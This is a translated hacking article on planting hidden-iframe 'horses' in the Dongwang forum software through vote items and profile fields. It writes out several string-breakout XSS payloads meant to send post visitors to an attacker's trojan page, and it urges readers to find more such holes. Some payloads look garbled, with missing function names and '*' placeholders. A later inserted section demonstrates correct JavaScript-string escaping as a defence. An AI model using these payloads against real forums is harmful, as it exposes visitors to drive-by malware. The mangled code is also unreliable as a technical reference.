Author: Yoge GXU Article source: Evil Octal Information Security Team
Some time ago, focn and others discovered a privilege-escalation vulnerability in Dongwang (Dynamic Network). That vulnerability caused an uproar, and even the Dangdang Network forum was affected. It is this vulnerability that overshadowed the other vulnerabilities in Dongwang, leaving them less well known.
I believe everyone has read the article "The latest horse-hanging method for Dongwang!", but that vulnerability had already been around for about half a month before the article was released. The method is to write the following code into the "personal homepage" field under "Modify personal contact methods":
</Script><IfraMe height=0 width=0 src=""></IfraMe>
Write the following code into the MSN field:
<Script Language=JavaScript>var actioninfo3='Single Post Blocking'
Among them, the src address is your web page *. In this way, when we post or reply, anyone who visits the post is redirected to our *. The principle is to deceive the original code. Today we mainly talk about another horse-hanging method for Dongwang: hanging the horse through voting. Testing showed that all versions of Dongwang have this vulnerability.
First, let's post a vote and see what happens, as shown in Figure 1.
Let's take a look at the source file:
<Script Language=JavaScript>var vote='ssssssssss';var votenum='0';var votetype='0';var voters='0';</Script>
Here ssssssssss is text we are free to choose, so can we deceive the source file and make it run our code? Take a pair of brackets as an example: (). When we write ) and ( inside it, it becomes two pairs of brackets: ()(). The principle is the same, and we can deceive the code in the same way. In the vote we are posting, we write:
';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='
By the way, the voting function of Dongwang is not strictly filtered. When the voting items are written as web code, the code can still be executed, and it does not have to follow the stated rule of "one voting item per line, up to 10": it is not split into lines. After posting the vote, check the source file:
<Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script>
The code cannot be executed: Dongwang filtered it. Think a little more broadly, though. Dongwang only filters < and >, and does not filter symbols such as +, ' and /. Write the code again in the vote:
';=+(60)+'IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src= width=0'+(62)+(60)+'/IFRAME'+(62);var vote='1
After publishing, I was successfully redirected to this site. If we change the site to our web page *, a * post is complete. In fact, this is only a small part of the code deception possible in Dongwang; there are still many places where it can be performed, such as user avatars, contact methods, etc.
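The weakness described above is that text placed inside var vote='...' is filtered only for < and >, so the quote that ends the string literal passes through. The following added example (not from the original article or from Dongwang's code; function names and the sample input are constructed) compares that filter with escaping for the JavaScript string context, using a harmless marker variable.

```javascript
// Added example: names and sample inputs are constructed, not Dongwang's code.

// The filter the article describes: only < and > are neutralised.
function filterAngleBrackets(s) {
  return s.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Context-aware escaping for a JavaScript string literal in an inline script:
// everything except ASCII letters, digits and space becomes \uXXXX, so quotes,
// backslashes, line breaks and "</script>" cannot end the literal or the block.
function escapeForJsString(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    const plain = (c >= 48 && c <= 57) || (c >= 65 && c <= 90) ||
                  (c >= 97 && c <= 122) || c === 32;
    out += plain ? s[i] : '\\u' + c.toString(16).padStart(4, '0');
  }
  return out;
}

// Build the script body the forum page would emit for a vote item.
function renderVote(voteText, encode) {
  return "var vote='" + encode(voteText) + "';var votenum='0';";
}

// Run a generated script body in its own function scope and report whether the
// submitted text stayed data (vote === input) or became extra statements.
function inspect(scriptBody, submitted) {
  const probe = "return {vote: vote, injected: typeof injected !== 'undefined'};";
  const result = new Function(scriptBody + probe)();
  return { staysData: result.vote === submitted, extraStatement: result.injected };
}

// Constructed, harmless input with the same shape as the article's vote text:
// it closes the literal, declares a marker variable, then reopens the literal.
const submitted = "';var injected='yes';var vote='1";

const weak = inspect(renderVote(submitted, filterAngleBrackets), submitted);
const safe = inspect(renderVote(submitted, escapeForJsString), submitted);
console.log('angle-bracket filter only:', weak);
console.log('JS-string escaping:       ', safe);
```

The same encoding has to be applied at every place where user text lands inside a script block, including the avatar and contact fields the article mentions.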
Postscript: Many program authors have not recognized the security harm of code deception. Among the many website programs I have read, whether ASP or PHP, many are open to code deception. I hope this article serves as a starting point and helps friends find more vulnerabilities.